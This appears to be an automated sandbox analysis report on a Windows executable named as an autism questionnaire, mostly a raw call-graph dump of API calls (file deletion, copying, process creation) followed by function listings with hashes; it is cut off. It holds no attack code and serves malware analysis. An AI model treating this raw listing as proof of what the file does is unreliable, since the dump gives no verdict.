21879->21875 21879->21877 21881 40c8a5 21880->21881 21882 40c89d 21880->21882 21881->21856 21883 40c654 59 API calls 21882->21883 21883->21881 21885 40c630 21884->21885 21896 40c443 21884->21896 21885->21878 21886 407068 12 API calls 21886->21896 21887 40c254 12 API calls 21887->21896 21888 40a644 12 API calls 21888->21896 21889 40c76c 59 API calls 21889->21896 21890 40a61c 3 API calls 21890->21896 21891 40d370 28 API calls 21891->21896 21892 40c420 59 API calls 21892->21896 21893 40a5a8 12 API calls 21893->21896 21894 40fd30 54 API calls 21894->21896 21895 40a1c8 12 API calls 21895->21896 21896->21885 21896->21886 21896->21887 21896->21888 21896->21889 21896->21890 21896->21891 21896->21892 21896->21893 21896->21894 21896->21895 21897 40c00c 12 API calls 21896->21897 21898 40a1ec 12 API calls 21896->21898 21899 40a210 SysFreeString 21896->21899 21900 40d32c 28 API calls 21896->21900 21901 40fd04 26 API calls 21896->21901 21897->21896 21898->21896 21899->21896 21900->21896 21901->21896 21903 5cd33f 21902->21903 21904 5cd334 21902->21904 21910 5cd2c8 21903->21910 21904->21823 21907 429008 12 API calls 21908 5cd35f 21907->21908 21909 4098c4 12 API calls 21908->21909 21909->21904 21911 5cd2dc 21910->21911 21912 5cd31a 21910->21912 21911->21912 21914 5cd1f8 21911->21914 21912->21904 21912->21907 21915 5cd219 21914->21915 21916 5cd203 21914->21916 21918 5cbf50 106 API calls 21915->21918 21917 429008 12 API calls 21916->21917 21919 5cd214 21917->21919 21920 5cd228 21918->21920 21921 4098c4 12 API calls 21919->21921 21922 5cbf50 106 API calls 21920->21922 21921->21915 21924 5cd249 21922->21924 21923 5cd279 21923->21911 21924->21923 21925 429008 12 API calls 21924->21925 21926 5cd274 21925->21926 21927 4098c4 12 API calls 21926->21927 21927->21923 21928 410bf4 21929 410c1f 21928->21929 21930 410c90 RaiseException 21929->21930 21931 410cb8 21929->21931 21948 410d25 21930->21948 21932 410dee 21931->21932 21933 410d58 21931->21933 21934 410d4d LoadLibraryA 21931->21934 21931->21948 21935 410e57 21932->21935 21938 410e4b GetProcAddress 21932->21938 21932->21948 21937 410d5c GetLastError 21933->21937 21940 410da7 21933->21940 21934->21933 21936 410e5b GetLastError 21935->21936 21935->21948 21943 410e6c 21936->21943 21939 410d6d 21937->21939 21938->21935 21939->21940 21942 410d7f RaiseException 21939->21942 21944 410db5 21940->21944 21945 410de8 FreeLibrary 21940->21945 21941 410e7e RaiseException 21941->21948 21942->21948 21943->21941 21943->21948 21944->21932 21946 410dbb LocalAlloc 21944->21946 21945->21932 21946->21932 21947 410dcb 21946->21947 21947->21932 21949 6acabc 21950 6acac7 21949->21950 21952 6acadc GetLastError 21950->21952 21953 6acb07 21950->21953 21957 60c158 21950->21957 21952->21953 21954 6acae6 GetLastError 21952->21954 21954->21953 21955 6acaf0 GetTickCount 21954->21955 21955->21953 21956 6acafe Sleep 21955->21956 21956->21950 21958 60bf74 2 API calls 21957->21958 21959 60c16e 21958->21959 21960 60c172 21959->21960 21961 60c18e DeleteFileW GetLastError 21959->21961 21960->21950 21962 60bfb0 Wow64RevertWow64FsRedirection 21961->21962 21963 60c1b4 21962->21963 21963->21950 21964 5c7f24 21965 5c7ce0 65 API calls 21964->21965 21966 5c7f2e 21965->21966 21967 6acb10 21982 6255b8 21967->21982 21970 6255a4 12 API calls 21973 6acb31 21970->21973 21971 6acb8c 21974 40a1c8 12 API calls 21971->21974 21972 6acb4b GetTickCount 21985 60dcc8 21972->21985 21973->21971 21973->21972 21975 61583c 50 API calls 21973->21975 21977 6acba1 21974->21977 21975->21972 21978 6acb6d 21978->21971 21979 40b4c8 12 API calls 21978->21979 21980 6acb84 21979->21980 21981 616130 112 API calls 21980->21981 21981->21971 21983 625d14 118 API calls 21982->21983 21984 6255c4 21983->21984 21984->21970 21986 60dd1a 21985->21986 21996 60def9 21985->21996 21987 60dd2c 21986->21987 22016 60c474 21986->22016 21990 60dd57 21987->21990 21991 60dd3a 21987->21991 21987->21996 21988 60df10 21992 40a228 12 API calls 21988->21992 21995 5c5428 12 API calls 21990->21995 21993 5c4ea4 12 API calls 21991->21993 21994 60df58 21992->21994 21998 60dd45 21993->21998 21999 40a228 12 API calls 21994->21999 22000 60dd62 21995->22000 21996->21988 22031 60c664 21996->22031 22001 40b4c8 12 API calls 21998->22001 22002 60df65 21999->22002 22003 40a5f0 12 API calls 22000->22003 22004 60dd55 22001->22004 22002->21978 22003->22004 22024 60c2b0 22004->22024 22006 60dd7f 22006->21996 22012 60dd8c 22006->22012 22007 60dec3 FindNextFileW 22008 60dedb FindClose 22007->22008 22007->22012 22008->21978 22009 60dde9 22010 40b4c8 12 API calls 22009->22010 22038 60c6dc 22009->22038 22010->22009 22011 40b4c8 12 API calls 22011->22012 22012->22007 22012->22008 22012->22009 22012->22011 22014 60dcc8 24 API calls 22012->22014 22015 60c158 5 API calls 22012->22015 22014->22012 22015->22012 22017 60bf74 2 API calls 22016->22017 22018 60c48a 22017->22018 22019 60c48e 22018->22019 22045 5c68a4 22018->22045 22019->21987 22022 60bfb0 Wow64RevertWow64FsRedirection 22023 60c4c1 22022->22023 22023->21987 22025 60bf74 2 API calls 22024->22025 22026 60c2c9 22025->22026 22027 60c2cd 22026->22027 22028 60c2ec FindFirstFileW GetLastError 22026->22028 22027->22006 22029 60bfb0 Wow64RevertWow64FsRedirection 22028->22029 22030 60c312 22029->22030 22030->22006 22032 60bf74 2 API calls 22031->22032 22033 60c67a 22032->22033 22034 60c67e 22033->22034 22035 60c69a RemoveDirectoryW GetLastError 22033->22035 22034->21988 22036 60bfb0 Wow64RevertWow64FsRedirection 22035->22036 22037 60c6c0 22036->22037 22037->21988 22039 60bf74 2 API calls 22038->22039 22041 60c6f5 22039->22041 22040 60c6f9 22040->22012 22041->22040 22042 60c716 SetFileAttributesW GetLastError 22041->22042 22043 60bfb0 Wow64RevertWow64FsRedirection 22042->22043 22044 60c73c 22043->22044 22044->22012 22046 40b278 22045->22046 22047 5c68ae GetFileAttributesW 22046->22047 22048 5c68b9 22047->22048 22048->22022 22049 6b8af7 22050 6b8b12 22049->22050 22051 5c8fb8 12 API calls 22050->22051 22052 6b8b56 22051->22052 22053 5c8fb8 12 API calls 22052->22053 22054 6b8b6f 22053->22054 22055 5c8fb8 12 API calls 22054->22055 22056 6b8b88 22055->22056 22057 5c8fb8 12 API calls 22056->22057 22058 6b8ba1 22057->22058 22059 5b8250 14 API calls 22058->22059 22060 6b8bb9 22059->22060 22061 5c685c GetFileAttributesW 22060->22061 22062 6b8bc3 22061->22062 22063 6b8bed 22062->22063 22064 6b8bc7 22062->22064 22066 6b8c06 22063->22066 22067 6b8bf6 22063->22067 22236 6b6874 22064->22236 22082 6b786c 22066->22082 22246 6b724c 22067->22246 22071 6b8c0b 22231 615560 22071->22231 22073 6b8bfb 22073->22071 22257 6b740c 22073->22257 22077 6b8c04 22077->22071 22078 40a028 12 API calls 22079 6b8c33 22078->22079 22080 40a228 12 API calls 22079->22080 22081 6b8c4d 22080->22081 22083 6b789f 22082->22083 22084 6b78bd 22083->22084 22085 6b78b6 22083->22085 22087 6b78fb 22084->22087 22284 6153ac SendMessageW 22084->22284 22490 6ae6f8 GetWindowLongW 22085->22490 22089 6b7925 22087->22089 22090 6b791b 22087->22090 22091 6b7927 22087->22091 22092 616130 112 API calls 22089->22092 22497 615ef0 22090->22497 22518 6160d4 22091->22518 22095 6b7972 22092->22095 22096 40b4c8 12 API calls 22095->22096 22097 6b7985 22096->22097 22098 616130 112 API calls 22097->22098 22099 6b798d 22098->22099 22100 40b4c8 12 API calls 22099->22100 22101 6b79a0 22100->22101 22102 616130 112 API calls 22101->22102 22103 6b79a8 22102->22103 22297 5c6e90 GetCommandLineW 22103->22297 22106 40b4c8 12 API calls 22107 6b79c0 22106->22107 22108 616130 112 API calls 22107->22108 22109 6b79c8 22108->22109 22302 6ae8a8 22109->22302 22115 6b79e5 22337 62c5d0 22115->22337 22118 5cd508 12 API calls 22119 6b7a14 22118->22119 22120 40a5a8 12 API calls 22119->22120 22124 6b7a21 22120->22124 22121 6b7aa9 22122 6b7198 107 API calls 22121->22122 22123 6b7ac2 22122->22123 22365 629794 22123->22365 22126 6b7a65 22124->22126 22526 6af190 22124->22526 22126->22121 22130 6af190 122 API calls 22126->22130 22133 6b7aa4 22130->22133 22132 6b7aee 22135 6b7b09 22132->22135 22136 6b7af7 22132->22136 22137 428fdc 76 API calls 22133->22137 22134 60cd28 12 API calls 22134->22132 22547 6b780c 22135->22547 22543 40a68c 22136->22543 22137->22121 22140 6b7b07 22369 6af854 22140->22369 22232 615570 SendMessageW 22231->22232 22233 61558b 22231->22233 22232->22233 22234 61559e 22233->22234 24623 4786ac GetWindowLongW DestroyWindow 22233->24623 22234->22078 22237 5cd508 12 API calls 22236->22237 22238 6b68a5 22237->22238 22239 6af190 122 API calls 22238->22239 22240 6b68c0 22239->22240 22241 40a1c8 12 API calls 22240->22241 22242 6b68d7 22241->22242 22243 428fdc 22242->22243 22244 4290c4 76 API calls 22243->22244 22245 428ff4 22244->22245 22245->22245 22247 6b73a9 22246->22247 22248 6b727c 22246->22248 22249 40a1c8 12 API calls 22247->22249 22250 6b7198 107 API calls 22248->22250 22251 6b73be 22249->22251 22252 6b7283 22250->22252 22253 40a1c8 12 API calls 22251->22253 24625 628c44 22252->24625 22255 6b73c6 22253->22255 22255->22073 22256 6b72a2 22256->22073 22258 5c75e4 52 API calls 22257->22258 22259 6b743c 22258->22259 24628 60d3b4 22259->24628 22262 60d8b0 126 API calls 22263 6b7465 22262->22263 22264 6b748e CopyFileW 22263->22264 22265 6b74a8 22264->22265 22266 6b7498 22264->22266 22268 6b74b5 SetFileAttributesW 22265->22268 24651 6b68ec GetLastError 22266->24651 22269 414da0 CreateWindowExW 22268->22269 22270 6b74e2 SetWindowLongW SetWindowPos 22269->22270 22271 5c6fb0 14 API calls 22270->22271 22272 6b7538 22271->22272 22273 4244f8 105 API calls 22272->22273 22274 6b755e 22273->22274 22275 5c6e90 13 API calls 22274->22275 22276 6b756a 22275->22276 22277 40b470 12 API calls 22276->22277 22278 6b7573 22277->22278 24666 6b6998 22278->24666 22281 6b757e 22282 6b758a MsgWaitForMultipleObjects 22281->22282 22283 6b75a3 CloseHandle DestroyWindow 22281->22283 24675 6b6a74 22281->24675 22282->22281 22282->22283 22283->22077 22285 6153d5 22284->22285 22286 615408 22284->22286 22287 429044 105 API calls 22285->22287 22617 4785f8 GetClassInfoW 22286->22617 22289 615403 22287->22289 22291 4098c4 12 API calls 22289->22291 22291->22286 22292 61542c 22293 60cd28 12 API calls 22292->22293 22294 615436 22293->22294 22296 615450 SendMessageW 22294->22296 22627 5c86e0 22294->22627 22296->22087 22298 5c6e00 12 API calls 22297->22298 22299 5c6eb3 22298->22299 22300 40a1c8 12 API calls 22299->22300 22301 5c6ed1 22300->22301 22301->22106 22303 6ae92c 22302->22303 22304 6ae8d2 22302->22304 22306 6163b4 112 API calls 22303->22306 22305 423004 12 API calls 22304->22305 22307 6ae8e8 22305->22307 22308 6ae993 22306->22308 22309 40b4c8 12 API calls 22307->22309 22310 6163b4 112 API calls 22308->22310 22312 6ae8f8 22309->22312 22311 6ae9b9 22310->22311 22313 6163b4 112 API calls 22311->22313 22312->22303 22315 423004 12 API calls 22312->22315 22314 6ae9df 22313->22314 22317 6ae9fd 22314->22317 22318 6ae9f1 22314->22318 22327 6ae9fb 22314->22327 22316 6ae91c 22315->22316 22319 40b550 12 API calls 22316->22319 22322 6aea12 22317->22322 22323 6aea06 22317->22323 22321 616130 112 API calls 22318->22321 22319->22303 22320 40a228 12 API calls 22324 6aea36 22320->22324 22321->22327 22326 616130 112 API calls 22322->22326 22325 616130 112 API calls 22323->22325 22328 6b7198 22324->22328 22325->22327 22326->22327 22327->22320 22329 5cbfb8 107 API calls 22328->22329 22330 6b71de 22329->22330 22331 40a1c8 12 API calls 22330->22331 22332 6b7239 22331->22332 22333 6292dc 22332->22333 22334 6292e2 22333->22334 22645 629594 22334->22645 22336 6292fe 22336->22115 22657 628ba4 22337->22657 22340 62c692 22665 62beec 22340->22665 22341 5cd508 12 API calls 22342 62c67b 22341->22342 22343 429008 12 API calls 22342->22343 22345 62c68d 22343->22345 22347 4098c4 12 API calls 22345->22347 22346 62c6c3 22348 40a5a8 12 API calls 22346->22348 22347->22340 22349 62c6d7 22348->22349 22350 62beec 13 API calls 22349->22350 22351 62c708 22350->22351 22352 40a5a8 12 API calls 22351->22352 22364 62c71c 22352->22364 22353 62c7da 22354 40a1ec 12 API calls 22353->22354 22355 62c7f2 22354->22355 22356 40a1c8 12 API calls 22355->22356 22357 62c7fd 22356->22357 22358 40a1ec 12 API calls 22357->22358 22360 62c808 22358->22360 22359 62c558 12 API calls 22359->22364 22362 40a228 12 API calls 22360->22362 22363 62c818 22362->22363 22363->22118 22364->22353 22364->22359 22683 62c3b0 22364->22683 22366 6297c7 22365->22366 22367 6297a9 22365->22367 22366->22132 22366->22134 22367->22366 22737 629700 22367->22737 22370 6163b4 112 API calls 22369->22370 22491 6ae7be 22490->22491 22492 6ae726 SetWindowPos GetWindowLongW 22490->22492 22491->22084 22493 6ae761 SetWindowLongW 22492->22493 22495 6ae788 ShowWindow 22493->22495 22496 6ae79f SetWindowPos 22493->22496 22495->22491 22496->22491 22498 616043 22497->22498 22499 615f25 22497->22499 22501 40a1c8 12 API calls 22498->22501 22500 5c75e4 52 API calls 22499->22500 22502 615f2d 22500->22502 22503 616058 22501->22503 22504 615dc8 2 API calls 22502->22504 22505 40a228 12 API calls 22503->22505 22506 615f35 22504->22506 22507 616065 22505->22507 22508 4244f8 105 API calls 22506->22508 22507->22089 22513 615f6c 22508->22513 22509 4244f8 105 API calls 22509->22513 22510 40b4c8 12 API calls 22510->22513 22511 5c6894 13 API calls 22511->22513 22512 5cbfb8 107 API calls 22512->22513 22513->22509 22513->22510 22513->22511 22513->22512 22514 61601f 22513->22514 22515 40a5a8 12 API calls 22514->22515 22516 616034 22515->22516 23090 615e00 22516->23090 22519 6160e0 22518->22519 22520 61610a 22518->22520 22521 5cbfb8 107 API calls 22519->22521 22520->22089 22522 6160f4 22521->22522 22523 40a5a8 12 API calls 22522->22523 22524 616105 22523->22524 22525 615e00 112 API calls 22524->22525 22525->22520 22527 6af1c2 22526->22527 22528 6af1d1 22526->22528 23094 6aef98 22527->23094 23109 6af0c8 22528->23109 22545 40a690 22543->22545 22544 40a6b4 22544->22140 22545->22544 22546 406f28 12 API calls 22545->22546 22546->22544 22548 6b781e 22547->22548 22549 40a3a4 12 API calls 22548->22549 22550 6b7848 22549->22550 22551 40a1c8 12 API calls 22550->22551 22552 6b785d 22551->22552 22552->22140 22618 478628 22617->22618 22619 478651 22618->22619 22620 478647 RegisterClassW 22618->22620 22621 478636 UnregisterClassW 22618->22621 22633 414da0 22619->22633 22620->22619 22621->22620 22623 47867f 22624 47869c 22623->22624 22637 47845c 22623->22637 22624->22292 22624->22294 22626 478693 SetWindowLongW 22626->22624 22628 5c8705 22627->22628 22629 5c86f0 GetModuleHandleW 22627->22629 22631 5c8725 22628->22631 22641 5c8644 22628->22641 22630 414020 14 API calls 22629->22630 22630->22628 22631->22294 22640 407404 22633->22640 22635 414db3 CreateWindowExW 22636 414ded 22635->22636 22636->22623 22638 47846c VirtualAlloc 22637->22638 22639 47849a 22637->22639 22638->22639 22639->22626 22640->22635 22642 5c8666 22641->22642 22643 5c8651 GetModuleHandleW 22641->22643 22642->22631 22644 414020 14 API calls 22643->22644 22644->22642 22646 62959a 22645->22646 22647 6295aa 22646->22647 22653 629554 22646->22653 22648 40a1c8 12 API calls 22647->22648 22650 6295b7 22648->22650 22651 40a1c8 12 API calls 22650->22651 22652 6295bf 22651->22652 22652->22336 22654 62955e 22653->22654 22655 406f28 12 API calls 22654->22655 22656 62958e 22655->22656 22656->22646 22658 628bba 22657->22658 22661 628bd5 22658->22661 22692 628b48 22658->22692 22660 628c0f 22660->22340 22660->22341 22662 628b48 12 API calls 22661->22662 22663 628bfa 22661->22663 22662->22663 22663->22660 22664 628b48 12 API calls 22663->22664 22664->22660 22666 62bf75 22665->22666 22667 62bf0d 22665->22667 22671 40a1ec 12 API calls 22666->22671 22667->22666 22668 62bf12 22667->22668 22669 40a1c8 12 API calls 22668->22669 22670 62bf28 22669->22670 22701 40ac84 22670->22701 22673 62bf93 22671->22673 22674 40a1c8 12 API calls 22673->22674 22676 62bf9b 22674->22676 22676->22346 22679 40a5a8 12 API calls 22680 62bf58 22679->22680 22681 40a1c8 12 API calls 22680->22681 22682 62bf6d 22681->22682 22682->22346 22684 5cd508 12 API calls 22683->22684 22685 62c3d8 22684->22685 22686 429008 12 API calls 22685->22686 22687 62c3e7 22686->22687 22688 4098c4 12 API calls 22687->22688 22689 62c3ec 22688->22689 22690 40a1c8 12 API calls 22689->22690 22691 62c401 22690->22691 22691->22364 22693 5cd508 12 API calls 22692->22693 22694 628b6d 22693->22694 22695 429008 12 API calls 22694->22695 22696 628b7c 22695->22696 22697 4098c4 12 API calls 22696->22697 22698 628b81 22697->22698 22699 40a1c8 12 API calls 22698->22699 22700 628b96 22699->22700 22700->22661 22702 40ac8f 22701->22702 22703 40acc6 22702->22703 22704 40acbc 22702->22704 22724 40a3a4 22703->22724 22706 40a1ec 12 API calls 22704->22706 22707 40acc4 22706->22707 22708 410144 22707->22708 22709 40a1c8 12 API calls 22708->22709 22710 41016c 22709->22710 22711 4101c7 22710->22711 22712 40b3f0 12 API calls 22710->22712 22713 40a1c8 12 API calls 22711->22713 22715 410187 22712->22715 22714 4101dc 22713->22714 22714->22679 22728 40fef8 22715->22728 22718 4101b4 22721 40a1c8 12 API calls 22718->22721 22719 4101a7 22720 40b3f0 12 API calls 22719->22720 22722 4101b2 22720->22722 22721->22722 22723 40a5a8 12 API calls 22722->22723 22723->22711 22725 40a3bb 22724->22725 22726 40a1ec 12 API calls 22725->22726 22727 40a3d3 22726->22727 22727->22707 22729 40ff0d 22728->22729 22734 40ff2a 22728->22734 22730 40ff68 22729->22730 22732 40ff15 22729->22732 22736 410394 MultiByteToWideChar 22730->22736 22735 410394 MultiByteToWideChar 22732->22735 22734->22718 22734->22719 22735->22734 22736->22734 22739 629713 22737->22739 22743 629724 22737->22743 22738 40a1c8 12 API calls 22738->22739 22739->22738 22739->22743 22740 62973a 22740->22366 22742 40a350 12 API calls 22742->22743 22743->22740 22743->22742 22744 40a470 22743->22744 22747 40a3dc 22744->22747 22748 40a400 22747->22748 22749 40a3f7 22747->22749 22751 40a439 22748->22751 22762 40a334 22748->22762 22750 40a1c8 12 API calls 22749->22750 22756 40a3fe 22750->22756 22752 40b3f0 12 API calls 22751->22752 22755 40a445 22752->22755 22756->22743 22765 410394 MultiByteToWideChar 22762->22765 22764 40a348 22764->22751 22765->22764 23091 615e1e 23090->23091 23092 6163b4 112 API calls 23091->23092 23093 615e8f 23092->23093 23093->22498 23095 6aec14 12 API calls 23094->23095 23096 6aefd1 23095->23096 23167 6aedd4 23096->23167 23099 4244f8 105 API calls 23100 6af001 23099->23100 23101 40b470 12 API calls 23100->23101 23102 6af018 23101->23102 23103 616130 112 API calls 23102->23103 23110 6aedd4 12 API calls 23109->23110 23111 6af0f4 23110->23111 23112 4244f8 105 API calls 23111->23112 23113 6af10d 23112->23113 23114 40b470 12 API calls 23113->23114 23115 6af124 23114->23115 23116 616130 112 API calls 23115->23116 23117 6af12c 23116->23117 23118 40a228 12 API calls 23117->23118 23119 6af146 23118->23119 23120 40a1c8 12 API calls 23119->23120 23168 6aeded 23167->23168 23169 6aee72 23167->23169 23170 6aee3a 23168->23170 23171 6aee48 23168->23171 23172 6aee1e 23168->23172 23173 6aee2c 23168->23173 23174 6aee10 23168->23174 23175 6aee56 23168->23175 23176 6aee64 23168->23176 23177 42302c 12 API calls 23169->23177 23184 40a5a8 12 API calls 23170->23184 23185 40a5a8 12 API calls 23171->23185 23181 40a5a8 12 API calls 23172->23181 23182 40a5a8 12 API calls 23173->23182 23179 40a5a8 12 API calls 23174->23179 23178 40a5a8 12 API calls 23175->23178 23180 40a5a8 12 API calls 23176->23180 23183 6aee1c 23177->23183 23178->23183 23179->23183 23180->23183 23181->23183 23182->23183 23183->23099 23184->23183 23185->23183 24624 4786c8 24623->24624 24624->22234 24626 628ba4 12 API calls 24625->24626 24627 628c54 24626->24627 24627->22256 24629 60d3d2 24628->24629 24630 5c4ea4 12 API calls 24629->24630 24631 60d3eb 24630->24631 24632 40a5f0 12 API calls 24631->24632 24643 60d3f6 24632->24643 24633 60d21c 12 API calls 24633->24643 24634 5c567c 12 API calls 24634->24643 24635 5cd508 12 API calls 24635->24643 24636 40b550 12 API calls 24636->24643 24637 429008 12 API calls 24637->24643 24638 5c6880 13 API calls 24638->24643 24639 4098c4 12 API calls 24639->24643 24640 60d4be 24642 40a5a8 12 API calls 24640->24642 24641 5c685c GetFileAttributesW 24641->24643 24644 60d4c9 24642->24644 24643->24633 24643->24634 24643->24635 24643->24636 24643->24637 24643->24638 24643->24639 24643->24640 24643->24641 24646 60d4a0 CreateFileW 24643->24646 24645 40a228 12 API calls 24644->24645 24647 60d4e3 24645->24647 24646->24643 24648 60d4b0 CloseHandle 24646->24648 24649 40a228 12 API calls 24647->24649 24648->24643 24650 60d4f0 24649->24650 24650->22262 24650->22263 24652 42302c 12 API calls 24651->24652 24653 6b692b 24652->24653 24654 5c857c 13 API calls 24653->24654 24655 6b693b 24654->24655 24656 5cd4d8 12 API calls 24655->24656 24657 6b6952 24656->24657 24658 429008 12 API calls 24657->24658 24659 6b6961 24658->24659 24660 4098c4 12 API calls 24659->24660 24661 6b6966 24660->24661 24662 40a228 12 API calls 24661->24662 24663 6b6980 24662->24663 24664 40a1c8 12 API calls 24663->24664 24665 6b6988 24664->24665 24665->22265 24667 40b550 12 API calls 24666->24667 24668 6b69d0 24667->24668 24669 6b6a02 CreateProcessW 24668->24669 24670 6b6a1e CloseHandle 24669->24670 24671 6b6a0e 24669->24671 24673 40a1c8 12 API calls 24670->24673 24672 6b68ec 14 API calls 24671->24672 24672->24670 24674 6b6a3f 24673->24674 24674->22281 24676 6b6a95 PeekMessageW 24675->24676 24677 6b6a7f 24676->24677 24678 6b6a85 24676->24678 24677->24678 24679 6b6a89 TranslateMessage DispatchMessageW 24677->24679 24678->22281 24679->24676

                                                                                              Executed Functions

                                                                                              Function 005C7CE0, Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 181memoryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • AllocateAndInitializeSid.ADVAPI32(00000005,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005C7D22
                                                                                              • GetVersion.KERNEL32(00000000,005C7ECB,?,00000005,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005C7D3F
                                                                                              • GetModuleHandleW.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,005C7ECB,?,00000005,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005C7D59
                                                                                              • CheckTokenMembership.KERNELBASE(00000000,00000000,?,00000000,005C7ECB,?,00000005,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005C7D74
                                                                                              • FreeSid.ADVAPI32(00000000,005C7ED2,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005C7EC5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocateCheckFreeHandleInitializeMembershipModuleTokenVersion
                                                                                              • String ID: CheckTokenMembership$advapi32.dll
                                                                                              • API String ID: 2691416632-1888249752
                                                                                              • Opcode ID: 78205a2b5bba4b993b19a948a1bb69f4b064863e39af3854e5d28bf474fd5d73
                                                                                              • Instruction ID: 9e47304f2c2519385998e5d426bc562542af73c677c294aaacd6cf1c30b33c32
                                                                                              • Opcode Fuzzy Hash: 78205a2b5bba4b993b19a948a1bb69f4b064863e39af3854e5d28bf474fd5d73
                                                                                              • Instruction Fuzzy Hash: A2514472A0830D6EDB11EAF98D42FBE7BACBF1C705F1044AEF501E6681D6789D408B65
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040E7F0, Relevance: 3.1, APIs: 2, Instructions: 63COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetUserDefaultUILanguage.KERNEL32(00000003,?,00000004,00000000,0040E8B0,?,?), ref: 0040E822
                                                                                              • GetLocaleInfoW.KERNEL32(?,00000003,?,00000004,00000000,0040E8B0,?,?), ref: 0040E82B
                                                                                                • Part of subcall function 0040E6A0: FindFirstFileW.KERNEL32(00000000,?,00000000,0040E6FE,?,?), ref: 0040E6D3
                                                                                                • Part of subcall function 0040E6A0: FindClose.KERNEL32(00000000,00000000,?,00000000,0040E6FE,?,?), ref: 0040E6E3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: Find$CloseDefaultFileFirstInfoLanguageLocaleUser
                                                                                              • String ID:
                                                                                              • API String ID: 3216391948-0
                                                                                              • Opcode ID: 4f4e845a1bd2874fd9ef47becd123c76b58742bb5706f28c9b712a7f9af8110b
                                                                                              • Instruction ID: 1e50cd0e94847efb8cb05e6df71b151ee34378a03d53e12baea26e8823c5d93b
                                                                                              • Opcode Fuzzy Hash: 4f4e845a1bd2874fd9ef47becd123c76b58742bb5706f28c9b712a7f9af8110b
                                                                                              • Instruction Fuzzy Hash: 71114270A002099BDB04EF96D982AAEB3B9EF45304F90487EF904B73C1D7395E148B6D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0060C2B0, Relevance: 3.0, APIs: 2, Instructions: 45fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • FindFirstFileW.KERNEL32(00000000,?,00000000,0060C313,?,?,?,00000000), ref: 0060C2ED
                                                                                              • GetLastError.KERNEL32(00000000,?,00000000,0060C313,?,?,?,00000000), ref: 0060C2F5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
